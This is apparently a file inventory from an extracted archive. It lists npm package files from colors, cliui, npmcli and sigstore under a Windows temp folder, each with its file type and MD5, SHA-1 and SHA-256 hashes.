C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\custom\trap.js	ASCII text	10BD79DAA882F24426CE6DD2130C283E	EC8D149DD0C3D5B260C83544A24C4F8BA6EB1A09	EAC886DF893BFA10E30E28228350D5A89126A4BA773A3D0E2D74D7B56029751D
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\custom\zalgo.js	Unicode text, UTF-8 text	FD04E09CDC372A7B98E03A0791A2C10C	874EEF937D0E95291E995584C132FB2A0DED6AAB	124463A7437210CD07269461255ECD45CE8AF1AC48C8508857CB07514FA42C03
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\extendStringPrototype.js	ASCII text	312D1A151B59C5662A717A9F2CB7A71E	8F67D601A072C9160FF688A21927753D5116D28F	DA39555A80DAACF5BF56DB9228CC5268A5EF2D209706AA8A7FB0C618902037EA
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\index.js	ASCII text	AFBFFA68255E2A11A197724A7F44266C	7D17BE54FD3E8709CCC8675C77E973087755FF10	1465F31DBE9E763BFC246F3AE66F78F8B3E3229ECADAF58135D12A7E2596D4EC
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\maps\america.js	ASCII text	5088213A9DB0E451AD6E583F6065CC31	93197F184AE42006229373314E3DF6E29B1602BB	A8747ED6F9FDE27C23D8374A87FA6A80898C72C9BE80959B405382624C07FFB4
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\maps\rainbow.js	ASCII text	D5ECD753D7F60ED9B25A56EBB85DEEAD	581CDFD9DD9D1449C2C0FC0D77FFDDA713415B6E	85641874E0C1B9304099169479BF89B29B46C7E042C16CACEF9B5E4C5F8B9E7F
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\maps\random.js	ASCII text	DCF15F9BFE36DB8471A73ED2465A5B30	B657B6477D0F9680A0E316ADA993DB165F28CBAB	A0461E6327C356E9815E4273C9972EF63C77535E9DDA29D7F5A8CF4B1B896ACE
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\maps\zebra.js	ASCII text	992877DB0BB4B1A8793B1CC0533ACC5A	577A98A2D5116FDF4145EFCDA27293052ADCC352	07F31C776E6FED5A0660DBD6D1848C5C0944F0A1E53E4A7813DA0B23286750CA
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\styles.js	ASCII text	CDAFDC6DC4D16CA04034F289D40547F5	F76065B794D382CD8702B19A0C4523A06D537D9D	D469BF3213ACD43F72BE593ACDACF925F248893E015F13C12A4A365A2076ECF2
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\system\has-flag.js	ASCII text	E2ABB168551E20C66E89E8BB2108C0EA	414FF6FE54234EEB07A52887BCC462DDBFA892E1	CBBE0081CC62A0E54ED201DC0C1503A507DAA076B7BDBAA40ECCFAA5FD9D1D07
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\lib\system\supports-colors.js	ASCII text	5E53710D6B83525F0227F5F9AFA4F6C1	232B5DA48A433E4C6F545B48FE692056B3A87445	8ED006395E84E32CF3AD027C789817360D3553E66CC01A63D66E0DFEA9F42A00
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\package.json	JSON data	B092A102465822C89484AAE094A5965A	32854FE5AE88137F329372C00C3DC2F614C94DBB	FE58F1CE2ED2BE1ECD7FCE134676372EB4949E2BA0D7D91D41B8F34A988E9576
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\safe.js	ASCII text	B9538BED90769A2FE122A57DC07A4943	A055C3C673FFE9DA4B9B6336F5D715B278913F19	672CC883942925CE2E36076CCAF2D3CAF7DEB7C50FFE65601B40DE54281CD1C9
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@colors\colors\themes\generic-logging.js	ASCII text	77A8C3B452702BDDC76E90F53E465FDF	7517E57D6DA65F3242DCD2D91A51C981BAFE7C48	20A79C0ECF57FE4736D6F04F808A772A64A3700C1DB9DAD4CCB37269EB761223
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\LICENSE.txt	ASCII text	83623193D3051CA8068A89A455C699CA	039FA81EB89FC5C892F5CE2D22EE6AC0A8503880	2DC0465729366C3A7890DFA9E972A1BA7048A26C02116FB8B419A6A1AC110149
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\build\index.cjs	C++ source, ASCII text	47DAE5DF7E3D5E0D94911F63B7DFCFB5	D48E8476113471B52120A1A5451A4F087C66FB0A	820AA357A7F6A022BFC3AC6AC19D1681921D0421CAE898D5096423C0FB3B8607
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\build\index.d.cts	ASCII text	BBC26F6E5D9AF34A3996E8A0A70C909C	56D687354A1D13989B2FA9E5409799B4916B5A37	385FCEBA2F49EE3F91CD436D3F84B389375E1E8F86906B23F47DF2E1B9C2B17B
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\build\lib\index.js	ASCII text	3DF08507EBEB83A522978C95A0E11631	D8BA04747A972E69C353347598653D250F644716	E67B3446F47D4A672339C99BEA9E987979DA9FC70F421701814CB9D52BA176BA
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\index.mjs	ASCII text	A2B246A7A0232E4C635709E49822B12E	3B8FA93AC8A7793DA40AD5B8F07DF2A4A8B9F700	B75D22297E1BD8992F86218F1749435D05921D2D765697E46A43F680B2EDC859
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex\index.js	ASCII text	4B05188FFF08C3F12812C29561915D54	BD2DEC3594C15A8ED8CC9D45EE8C2A6FDEDCFB37	110C5FE554ECCDDA9B95BE9A33EDD4D4E867C8432460A8F39C9B7FF841B00772
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex\license	ASCII text, with very long lines (460)	D5F2A6DD0192DCC7C833E50BB9017337	80674912E3033BE358331910BA27D5812369C2FC	5C932D88256B4AB958F64A856FA48E8BD1F55BC1D96B8149C65689E0C61789D3
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\ansi-regex\package.json	JSON data	D2894A8EBBC4840E85527B8C051DAC86	DABD0C9882FB3B8C12222595FB92AD26B60671A1	8A331BEBFC9225B6AFE7A15542843A78BA7943454B6261CFE60B734513E1D32C
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\RGI_Emoji.js	ASCII text, with very long lines (12899)	ECFE555612280520671011F810C4705F	279C292E4C45265FA06A8957FDD6E1643FDBFD3E	D02478271A0E0BA3A1753FFB2217ABA4FF6852ECC6833EEA880946B15103A8F9
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\RGI_Emoji.js	ASCII text, with very long lines (13953)	C356C4D646D1460F1D61617DBF60522E	780B5F3A12284F0DCC50DDFBAC2611C79535C719	6EF32D4593F0F75CC80D87D49EBA6C635A6AC9B5E0F8202520A6027277A7134E
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\index.js	ASCII text, with very long lines (17334)	C934D55B9F92A8D3BEA1F6A87FA56533	FA44CE6A357BBF705C09E42D5CDB194F59C1E79A	8899E020A16B1D0647C6BBD84E17592F1DEF5E65F4818FD7C21C0F10008B04DD
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\es2015\text.js	ASCII text, with very long lines (15725)	12148D2DFF9CA3478E4467945663FA70	50998482C521255AF2760ED95BBDB1C4F7387212	1FB82C82D847EBC4AA287F481FF67C8CC9BDE03149987B2D43EB0DEE2A5160B6
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\index.js	ASCII text, with very long lines (15658)	D59A0C2EBD6EEA2ECDE91D5D8DB69597	415B8552CC069B0B51EC9A0D11E674D0D7BCE944	0766305FAF3D167FFD85AD6B6D52C80BFEBB90187D83EA6F96ED84B583777E95
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\package.json	JSON data	4A14D4B54700538E3369C29F7E6F2379	238C48183550D02AB5C0DD37E13D57006DCE640A	181FA046BDBB7D8958C57DCEF2E63AEA9AF667036E218C7222479A8618375F1A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\emoji-regex\text.js	ASCII text, with very long lines (14391)	7B33DD38C0C08BF185F5480EFDF9AB90	B3D9D61AD3AB1F87712280265DF367EFF502EF8B	D1E41C11AA11E125105D14C95D05E1E1ACD3BEDE89429D3A1C12A71450318F88
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\string-width\index.js	Java source, ASCII text	E425955CCD341CF2B2B4B95366B687E7	84E24B625A49263B8192B39507002656E64F8302	4508758772B1F52850B576CA714BBFD6EDB05F8D36492CEAB573DB47F5CD7D84
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\string-width\package.json	JSON data	6370FD65C542B20D05BEB70FD94E5AEB	53AE7A1B3953E86624927FEC8421D453D9C88E41	ADBCB3B95EA29C1F2A91A0AF600FD9136CE408A38622332848BA4630DC473659
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\index.js	Java source, ASCII text	A6FC9AB578293C89852087B7B0D78552	B443533358BE43AE037F23CD250E3352AE1D6029	C5BB23B3CA69E97DDEFDB76724B1A7936AC18B5E47C3FE3C5391969D6E6D06F8
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\node_modules\strip-ansi\package.json	JSON data	A1A0019976C3F4994C816DF2EB411962	323EC71C0CDB2DFDCF717F3E324F0B77981D7C58	01CEE5E384D1E26843021C1F91BC05ED009E14C2D31C01349A374E64D3416E7D
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\cliui\package.json	JSON data	A5CD1A3E1D5276BC314C376FE1084394	5F8F4C1E3BF1144F3A52C51BF040D843BB2A8B90	B4F9CC8D09602A487DEA1C227CE24777CDA87E2AD8A29AB9F741214AB78DC065
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\string-locale-compare\index.js	ASCII text	3977396BEE816D3A9EDD26083A7B2297	4B294FD8FCEBC309FD7139B3F33344F376BBB08B	CD6025C8F45932DA9C61FAC350542414CFBF2BAD9F01F9CA78AA84F038E4A390
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@isaacs\string-locale-compare\package.json	JSON data	F2090537182B2E5883272A44DE007C61	9DC38644EA6F125E3B06825FF04DF5EA22F56094	45B3F486E72A9D0E0279CDA0003713DDE115B7D0D75C4ACFA7129CFFB97E4AB3
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\lib\agents.js	ASCII text	3EDBB1D7C3470EEBF949997CA9949B97	193D815AA1F38CE500506A6D654A4B1A6536743A	0A9D06FC14BD78AA7EE59635ED5284F64E571A33B7DA13A5F48D0789307DEA81
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\lib\dns.js	ASCII text	F7A03D587E16CD4CC9D082FB6EBE2E0F	2A474310F48BC231EFB9EEBA7673C1EC71150391	58A0ABCFB7AB16ECE73A1FEA304B8CB4539F650C4F2726E2D5980C285A96351B
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\lib\errors.js	ASCII text	E9887AA65F829642474E034E10CF1A12	33354127DED477A54C9D25F677A0ADEBE45AF151	F4EE0F8A8AC25830BE4A902246059D260E5254BA9E2E766EEF84972EEB66926D
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\lib\index.js	ASCII text	E41DACD9A9F8D7444C7C01C3BB86C52A	26B6D404D602CF44F0E6386DB26836D25764498A	8D7B321C0EB45D3DDACC78B48448B2ED02AD79284F931D73F4BD0A67D0F5A4DD
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\lib\options.js	ASCII text	B42C7FAFD08DC1B8F21A532CC53F5037	5A62DE6018AF590EB8661F2042871753E8F7FF51	C475022B830424DBDF75987670549F32BC08C43C224731FD20CDC4F747F56901
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\lib\proxy.js	ASCII text	CF37AD09E180F34501C5D3225A1A3BDE	29B9CA8D1D1C0C6A6AB125A49078BF716CAD86BB	192A78A72232F67D0CBD46FE8F9DBD994F98C197CB345570C312AAAC12831111
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\node_modules\agent-base\dist\helpers.js	ASCII text	978A0823E78E9CBD9EC52C4FD73444AA	16FECB2FD128064BBC3EF6AF64AA48291CD1FE60	6043C5C1BB76491992F6C56F65895E2E9167AE10122FEF4D58D6638EBAC4BA05
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\node_modules\agent-base\dist\index.js	ASCII text	1A2CDE316A5277E6E19E4C7E4030135F	A76144710515A154821759A75E97B38EEB64E394	D1118107DF038CCBA8E6C9BEBD78A6C9975F5906EE128E1FE0CD34AF25123269
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\node_modules\agent-base\package.json	JSON data	6CF16A99196F52F28CBBB366118DA4A6	757AC71C6057973E410D08CA8DFD1562E731754C	64266F0007635290ADC31871142A8BF305B52D8C51443107B274A18405F26D2D
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\node_modules\http-proxy-agent\LICENSE	ASCII text	DC944E6612DA9341E648E5FD43DAB7A2	E08E2F8A1B49469468C5771239F00591DB3BEFD8	5AA012C5C5E970177D1FF9144121A598FA082434391061504B2D77A70289097F
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\node_modules\http-proxy-agent\dist\index.js	ASCII text	7D5B6FC35C36DD6EEB8AB07A3252D283	669A3B8EA2F3274F861FC416F75D43727676BD67	B4CD12238114F78CBF58CD8CEF3B25EEE4CB40FF2D57FC3EBD5FF3A80C2EB131
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\node_modules\http-proxy-agent\package.json	JSON data	778472210489A5B2074432113895B5FA	B5B3434273CFFA35FA3CEE9DC2F36751442D2882	A55E0F41B5604D0479C1179F09F55A624F7F2092A89207BDC5B438323F4F6770
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\node_modules\https-proxy-agent\dist\index.js	ASCII text	85E012FD9DFB97FF531EB1EDEF920F08	BCF1B915C657EF135A16461DE40007CBD301EE02	66A6E393E010944B14D56C1C01539DA50A40D249E1CA24F692568ECB5215CB2C
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\node_modules\https-proxy-agent\dist\parse-proxy-response.js	ASCII text	D140345EE9C006E6897CD2C800B25A41	977F28E0AC856A4C989BE779CFE337E6F47D7B61	36A30EBCD66060FA8E3ABA8295854757AFBD60F2643D8992814727F249C5EBA0
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\node_modules\https-proxy-agent\package.json	JSON data	5EB72D18E27F5025B9A9DD856550F49D	3C71093D44BE0C91A36D2C2953170B59EDAF4CEB	F62F929F550F77C2AA9A088FC1D86F278CB0AAB361C3A0BD9DC2159D9E398377
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\node_modules\socks-proxy-agent\dist\index.js	ASCII text	0CB45D485991A7313AF036F865B89F3B	890C3A0BCF5F8D5D585BC8099C3EA28B1210C0F3	C7C8D491F3A7121930E7A3C349286BEF177412D480E99416FD0EC760F753BF8D
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\node_modules\socks-proxy-agent\package.json	JSON data	6D286E77C24552CEA1D27FCDD61C038D	648C681D3A825962385D38434EF018D4F368FFBA	32D6A42739468B18E603574418F50C64E7A90B515F005957D82A83BBE064118D
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\agent\package.json	JSON data	2DE277CAA6AB7DB160A74DC6CBC80A9A	B13705199349A33B543565A266E33616E02837C4	D2DB1AD9D4780FD5B82DBDF35A3A30409C225F6B1B86748552817EE372541A87
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\disparity-colors\LICENSE	ASCII text	D80A3B8216B56C31766EEFEC43A9081C	6E7118376680E2881DD17A196F923D879B6C9A34	9DD1BC5666FD1E32F086518046532E993F5307749327AFF37CECF98355F2B9A0
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\disparity-colors\lib\index.js	ASCII text	915A3A45F508FE42C50143E822771C07	B9116C2DBE58A228EF561F888773D9A5580BD7C6	54F6EECF7C0C4DBA4B473B2E4012B9740E324A236EF7C29A89513DE0CC578E31
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\disparity-colors\package.json	JSON data	F9635A9598908DAB311FBF047209C652	799957D0A4590B694EF2457DBAA4C5C04B259EB5	F78299230047EC400366763B35353E41565CF25A924538A47906FFF316C7ADD8
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\fs\lib\common\get-options.js	Algol 68 source, ASCII text	B4354F6B8F8E2F5D7F695EEC9131753F	F715742A9ECA366EE9F876155A4FF2247EC9439A	9EFFC9EB07753C26041C78A42338687C9DBC3A2FE7580256277D1E6F9B6CE4E1
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\fs\lib\common\node.js	ASCII text	FA6921F91A421D1681DF1B09EED61DB4	093D6E28561E89A93B28EF446C6CB26254F3E021	3682E75CCD114A154EC490DB83CB92E4E81A7001F98551305CE8E1F78CEF3CBD
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\fs\lib\cp\LICENSE	ASCII text	EA817882455C03503F7D014A8F54F095	DD164BC611BCA7BA8EAD40EC4C2851081E5A16B9	1E76029602AE9B21CC4E612DB2496D92FEBED882BA13BA745F8B3309E85F9D39
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\fs\lib\cp\errors.js	C++ source, ASCII text	EFE1987E99CBCE7C9792A4C2B7E61603	912B3DA9DE65A067CDEDBA8B4DE2510974D3905D	A7D09952191CDE9205664FF85CD97EDF0B765AC0903105039C6C735249269861
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\fs\lib\cp\index.js	ASCII text	1B23509B8FB16BE962414E575C44F9E3	9CD971F3DA8FCA47C1245AD6545F9C82CBF7B6E1	F92557B351461096D1E9E9DC5446E0D7241CC26FCA08B4627A1B00246D54FC73
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\fs\lib\cp\polyfill.js	ASCII text	66146F2D7176F34B0D88E02DC6EB5625	262578F1B3AEF7FAEF99057B79C851D9359B66C7	39F6E60D75218EB0B26DFBAA10B805778EE633502A6D1156D92CDB6C6E78BF37
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\fs\lib\index.js	ASCII text	4A67406015C9F032E4335E01B7DD85DA	A36654CDA5B70FCB6E85B9228BF340EA91BF6B10	54747B38CB1F467BC5E50F1AF7388159186BFE594D85C68BB43F3DEB8325D2C3
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\fs\lib\move-file.js	ASCII text	236766FA9C36B989A6EEA3D6271C30A7	4C6989557E93132544C9D273F82AAD9E06F3C9D1	0684A070ABD953942292192E65A81BC79D404A478AE7DE17BC61827CB464D5E2
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\fs\lib\readdir-scoped.js	ASCII text	CCECE4CD35478408100F4DD41AFAFDD5	39B656DECDA58C663A0E684E0EF8B996035BBA0C	5AEB27AD14FCAF82C879DF66B79068D670C9E10E91E0483D0B72FDC87C00658C
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\fs\lib\with-temp-dir.js	ASCII text	519028A7FFD39BC64E5EE9BD9B80316B	FE5DE6222CE6C79D4A53EF8F5457574C25809D0C	866D28B80E53A2A09985C23D99DBAC867487DBD5DFDC8CF3DF5C844C6BEAFBF8
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\fs\package.json	JSON data	DD35080750793074568B75E54C645B16	9601F97992448C68D8F87AB9B2535C717FF01868	F055CDE11E9FCC5328E05268F5337621EDA31A71A9AF1E609039AE2F0B5155EA
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\git\lib\clone.js	ASCII text	8DD7842C3F02A5898F39F5AF08E6B38D	A8C18F54C4ACD285B11448D122AC6A4489C52066	459EC3DB39773683346D39233C9CEC9176667E1785240F6C861D276DDF9E9B8A
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\git\lib\errors.js	ASCII text	449CDF05E1A78F45B03D7FD842AF47BC	76D4ACBD14733CD9B9E5B1F5F5B783E9DD1E25A0	7320C74C44840322B20480B8D340FD079BBAA2E5267FE60889D990D6A29A2849
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\git\lib\find.js	ASCII text	431301ED7209995FD1C85BEA39672306	757C1E3B9AC92DE24E568D07476220F55FC05DAD	60B0559E699B01AE777E941CAC75A8B8BD541F524BEA8BA05B5C9055250733F3
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\git\lib\index.js	ASCII text	4290EF856C1871F9CAC149342141414C	3AF8E9638CA36CF72646CF6A7F5B34A11B01A526	CE74E39939A74D25CBA6C789BA1CB143AF903884829E6CB105D2F1D69351D324
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\git\lib\is-clean.js	ASCII text	A8D307C6A8A55F39A52958AA4D70E60E	5C5F3C069C9BF2E353D099B189C61B668DCDEA55	886581ADD04269EA242570EA702A14A2A1419914ECAA504DCFB288E6B85903EC
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@npmcli\git\lib\is.js	ASCII text	852E252B652B1E631F19DF0CCC9B9558	26E6AEC58F71567455C634BBDCDD414FB3A90D80	1BC3941620B55E3FEE7BA4804D3800A66D8E74D67FAC34F00A74F491C370FDA8
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\identity\ci.js	C++ source, ASCII text	F6707C0F0122704A3967C18BA54E0E85	B29D9E84FB6E34C7802319BCC28A7BFF7EE1B4EA	8C59E9DD26ADB98C4F3129CDF82FBFA46F7CCE4279F5FDC8CD062CEF1A52371B
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\identity\index.js	ASCII text	594D593DD1820112D8EDF1F7ECCF418C	276681A8C7EF08D62B88432957EEE9C404F829D9	CE801C2B4439FAAD508A9CBB84C2BBE841A38CD54F46C849C6284E4F28A8AFA0
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\index.js	ASCII text	D748F6C1728AB56E36F03DCFE93D4BE2	6855B9FCD0FEF5D05DE437A7E0DFAA37512FEEAB	E50EC700A3C52848B9E495B6B5B500A65BFDA28A21F6C1C786411BAAE1B5D909
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\signer\fulcio\ca.js	C++ source, ASCII text	4F97271B9F6AA8F9080258D59035FA59	DD3BEB2BD17A50CE4EF36B378C1D7E316B17D2DF	E5AE84BD97E0A19F35B3B706668A98930CD9B80498C7D732ED4BF878EEA822D9
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\signer\fulcio\ephemeral.js	C++ source, ASCII text	FA6F7C97254FF22E1EC5D0267A746416	2AB9A25B153FDD5DB5255CCADCCC77D82E81B47F	03BBBBE11E2EB159CD37CA3A0B4E90E62537083F8D6DDC7DBC1126FCCE91C212
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\signer\fulcio\index.js	C++ source, ASCII text	F8B0D0348D57122FE2AAAB09420172C3	549AFC9FABA8D5C77D2473C79B72895FD8DC2B2A	CC4124686B7B6D10F3FE1128F22714920852B639F939F58FF290701821ECE3EC
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\signer\index.js	ASCII text	54AC9702F63D78F6251C26395CF03546	8B9F9A20150F08A22766DFC76AB3699DD2B95826	37FE81E0A09F2B339B9196AE2C80DAF1AC7355AC4EE25468753E41DBDB82BC00
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\signer\signer.js	ASCII text	C95686DAA97AB29E0B88E55D94924DBD	0AB702D6E4DC23CF17C77C0B1960090D91FC9B4C	FD8AECE4BC1044E0324B98B6A525084CD19DC16960B91DCFC28633F94D64FD7E
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\types\fetch.js	ASCII text	8963201168A2449F79025884824955F2	B66EDAE489B6E4147CE7E1EC65A107E297219771	D43AA81F5BC89FAA359E0F97C814BA25155591FF078FBB9BFD40F8C7C9683230
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\util\crypto.js	ASCII text	EA221803FF0EA63008E76666203A07B1	B98C818BFF6B68FD704408E386097C339B0D62EC	062A89FD85EA239B5AAF237BE725EC87733D88BF64BB12A96BEB7317CE420E40
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\util\dsse.js	ASCII text	6590A888C4AFEC94EA28398443A5D6E6	974E2C22D3256722AF5E8B912F5182535EEF1CBB	DD82FC8943BA1C472B91FCFBE46919CFB103C7988F85EE68F75ABF85A8DB529C
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\util\encoding.js	ASCII text	72F5468812F2823D83AF83DED9733C2A	39C5CFD6077BCF042DDA2C01861135AB4F343AB0	30B256E08414A27B7068711302FD08EB2221ECA1900F11764B91F10E49CF8705
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\util\index.js	ASCII text	89E960A96E4271D3D72000681B7DE779	4771772A6323EA00AC015D8CE698CCEE64EFED5A	79C55A8D7F92A26389942AE679B3EDB16A4DCB8457DE638096A06627907273D2
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\util\json.js	ASCII text	B15D152FF80150E679CEE7F441091B36	02A44A2B9CD6C19B1AF7CDD0B7043747CDBA72F0	CB3ADB661FD056E40C147D0036E854DD742630A61935810CE03F9E5BA2CE2AFE
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\util\oidc.js	ASCII text	C8462565F2EAF27F3C04D2AD1B1585D9	D2672675654B0DCC84771E23498511AAD7BFDBB5	9B83928F5BB5ED0FF2DBFCE3041BAB358971D7259BC9F6759D791FA7EAC6837B
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\util\pem.js	ASCII text	634E33D2BD3582721F2AF59DB0BF9D2D	7F765FD51F6DACD2306E2DA4B7E7A7B8FB849F75	36B40FAB54056B35D2623E48D5EF4E891C99FF3AD6DF5C678EF06253B82DABF5
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\util\ua.js	ASCII text	E92C9A54026BC78CF4BE3CC9997FA42D	106D8BE45935D7BB38CA6CFD16F3947DF0B80F6C	4ACC489543A8D4BAD0CD6A7BA6E9D02B4CAAEBFA8F72B73784A86114C47FA886
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\witness\index.js	ASCII text	0728581D3577AEE576BBDE9CC4A59EA0	757230D82FA25A1CEFB75098EDA215EE67A55584	8892F7721A935600A3867382BC3853DD909E72E8499F4A4E8720D0C88F9E0091
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\witness\tlog\client.js	C++ source, ASCII text	E76FE23F5C9FB5E5113A5AF7DA98B598	9D306647A9053996A0032715CE2E33156D1F5BEC	6F547BD619D7E84075580E1610AF9C55CBEEB122BC29332E1E215D9D4EDBAAD0
C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\node_modules\@sigstore\sign\dist\witness\tlog\entry.js	ASCII text	2C976F04754DB7EE762F68AA446DDF05	2A61EED90B465FF6F04E3D22B133C50CD93E28DB	2D7885DE01525301453492E9B4F84C2CFEA821B925310E50677572BF99175EA6
